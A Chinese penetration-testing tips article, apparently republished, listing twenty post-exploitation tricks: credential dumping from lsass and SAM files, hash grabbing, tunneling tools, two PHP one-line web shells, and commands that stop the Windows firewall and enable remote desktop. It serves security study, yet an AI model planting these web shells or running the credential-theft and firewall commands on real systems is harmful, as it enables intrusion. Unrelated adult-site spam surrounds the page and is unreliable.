成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

滲透測試筆記八

安全 黑客攻防
在win系統中,控制用戶登陸的系統進程是“winlogon.exe”,系統在每一個用戶登陸時都會產生一個“winlogon.exe”進程。通過查找這個進程訪問的內存模塊,可以獲得保存在內存中的用戶名和密碼。

滲透測試筆記主要為一些短小但又精華的滲透小技巧,旨在與小伙伴們分享學習心得。為保證質量,每一篇為20條左右的滲透小記。

[[110986]]

1、在win系統中,控制用戶登陸的系統進程是“winlogon.exe”,系統在每一個用戶登陸時都會產生一個“winlogon.exe”進程。通過查找這個進程訪問的內存模塊,可以獲得保存在內存中的用戶名和密碼。

2、“Lsass.exe”是win下一個必不可少的進程,屬于微軟win系統中安全機制的相關進程,此進程主要用于本地安全和登陸策略,同時也管理域IP相關的安全信息??捎肔SASecretsView這個軟件破之。

3、上手的時候,先搜搜有沒有備份好的SAM文件。例如管理員經常將重要的文件備份在c:\windows\repair或是c:\windows\backup下,如果找到,將省去大半的功夫。

4、有經驗的管理員會使用C:\Windows\System32\syskey.exe這個小工具來對系統密碼做雙重加密,像bios密碼一樣加多一次防護。

5、跟SAM文件的防護機制一樣,syskey.exe這個小工具也會生成一個類似的文件叫做system。也在c:\windows\system32\config目錄下。可用SAMInside軟件附帶的一個小工具GetSyskey.exe來抓取syskey。

6、對方開放42端口要特別留意,可能啟用了WINS服務,進一步說明背后可能有著復雜的內網拓撲結構。

7、進行嗅探時,對網絡結構布局的了解是必須的,否則嗅探很可能會失敗。常見的VLAN類型有以下幾種:(1)基于端口的VLAN.(2)基于MAC地址的VLAN.(3)基于路由的VLAN.(4)基于策略的VLAN.

8、HTRAN、LCX等端口轉發出不來被墻的一個解決辦法猜想,可以看看對方的防火墻是什么牌子滴,下一個回來本地看看它升級的時候流量是從哪個端口出去的。(不過大型企業的防火墻都是在內網的,服務器省級的….)

9、HTRAN、LCX轉發失敗,還可以嘗試的辦法是80端口復用,也就是HTTP隧道,這方面的工具有reDuh和tunnal(使用說明請戳這里)

10、使用wce_1.4.exe可以非常有效地抓取windows的哈希,如果不成功,可以嘗試以下兩點:(1)提升到system再次嘗試;(2)在非系統終端嘗試一下(webshell)

11、如果再不出來,在嘗試下PingTunnel(Ptunnel)和DnsTunnel(DNS2tcp),如果不行,那就只好360你好,360再見了…….<( ̄) ̄)>

12、linux主機傳二進制文件的幾個方法:scp/sftp/ftp/tftp/wget

13、簡便執行命令的PHP一句話(當然,很多網站都會把system函數給禁了):

  1. <?php echo '<pre>';system($_GET['cmd']); echo '</pre>'; ?>    #用法xxx.php?cmd=whoami 

14、一句話上傳不上去?不妨試試這個:

  1. <?php $_GET[a]($_GET[b]);?>          #利用方法:xxx.php?a=assert&b=${phpinfo()}; 

15、在windows執行命令時,遇到空格用“”括起來就可以執行,例子如下:

  1. net stop windows" "firewall  
  2. net stop Windows" "Firewall/Internet" "Connection" "Sharing" "(ICS) 

16、干掉IPSEC后仍然無法連接3389,就可以用到antifw工具,自動停止IIS將3389轉到80上,本工具介紹請參見本站文章

17、命令行下查看3389遠程桌面信息:

(1)查看遠程桌面有沒有開啟:

  1. net start | find "Remote Desktop Services"         #win7、win2008  
  2. net start | find "Terminal Services "                     #win xp、win2003 

或是

  1. REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections 

如是0×0,則可以連接,考慮是否有tcp過濾或者防火墻了;如果沒有打開為0×1。

(2)查看遠程桌面連接所開的端口是多少:

  1. REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "ServerWinStationsRDP-Tcp /v PortNumber 

一般默認顯示是0xd3d , 也就是3389。

18、命令行下開啟3389:

  1. REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 

win7親測可用。

19、一些網站的網頁沒有擴展名,或者只出現.html的靜態網頁的拓展名。判斷此類網站用的什么技術,需要從幾方面分析:

方法(1):

查看該網站的開發開放平臺。

a.比如:GOOGLE有個GoogleCode,里面提供GOOGLE各種Search Engine API,還有GoogleAJAX。那么GOOGLE提供的API全是JAVA的(全無PHP,ASP等),由此可以判斷GOOGLE必定就是JSP。

c.再比如:去維基百科,當你點到某些提交信息的按鈕時候,IE的狀態欄(下方)會馬上呈現…php的拓展名。正常在地址欄上看不到.php的原因是,Wikipedia會把你提交信息后,轉到另一個.html頁面,而不會直接顯示那個.php頁面。

方法(2):

學習JSP,PHP等相關技術,就能了解用這些技術開發的網站的特點,根據結構就可以判斷。

a.比如:校內網,他們在招聘開發者只要求會JSP,Struts(JSPMVC的結構之一)。而且校內大部分開放平臺開發的游戲都是JSP寫的,由此斷定,校內就是用JSP的(其實校內拓展名.do是典型的JSPStruts)。

b.比如:百度,從它貼吧,知道上提交模式,以及百度大部分拓展名都被隱藏(PHP網站經常用apache里的功能來隱藏拓展名)來看,百度就是用PHP的。

方法(3):

在該網站的招聘要求中,看看應聘網站后臺程序員,需要會什么語言。校內網的招聘網頁,就是個好例(yin)子(dang)。

責任編輯:藍雨淚 來源: 網絡安全攻防實驗室
相關推薦

2013-11-28 11:29:39

2013-11-28 13:03:17

2014-02-18 15:53:04

2013-12-10 09:51:18

2013-12-24 13:15:59

2013-12-30 13:11:03

2013-11-28 10:32:10

2019-12-24 13:34:24

滲透測試網絡攻擊漏洞

2019-12-23 14:47:19

漏洞滲透測試錯誤姿勢

2015-07-15 09:30:07

2014-11-21 10:32:33

2009-01-10 23:38:16

程序員考試筆記

2014-05-16 10:55:47

Spark

2023-07-13 23:21:02

2017-07-24 17:00:49

2016-09-09 01:14:17

2013-11-06 16:38:59

2021-07-15 10:46:21

滲透測試網絡安全網絡攻擊

2010-08-03 22:09:16

2023-07-08 00:17:38

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 成年人视频在线免费观看 | 中文字幕一区二区三区精彩视频 | 99r在线 | 视频一区 亚洲 | 国产精品久久国产精品 | 国产一级在线 | 国产精品国产精品国产专区不蜜 | 91麻豆精品一区二区三区 | 国产在线精品一区二区三区 | 成人综合一区二区 | 久草视频在线播放 | 日本a∨视频 | 日本久久久久久 | 在线免费看毛片 | 成人精品视频99在线观看免费 | 精品国产乱码一区二区三区 | www.久久国产精品 | 超碰一区二区 | 日韩国产欧美视频 | 精品一区av| 热99精品视频 | 在线看av网址 | 一级片视频免费观看 | 91资源在线播放 | 国产成人在线免费 | 日本精品一区二区三区四区 | 国产专区在线 | 亚洲一区二区三区免费视频 | 国产日韩精品一区二区 | 婷婷中文在线 | 伊人免费在线观看高清 | 97国产在线观看 | 久久久久国产精品一区二区 | 一区二区三区四区在线 | 久久国产精品视频 | www.中文字幕.com| www.国产.com | 亚洲精品日韩综合观看成人91 | 午夜三级视频 | 亚洲一区二区三区免费视频 | 亚洲香蕉在线视频 |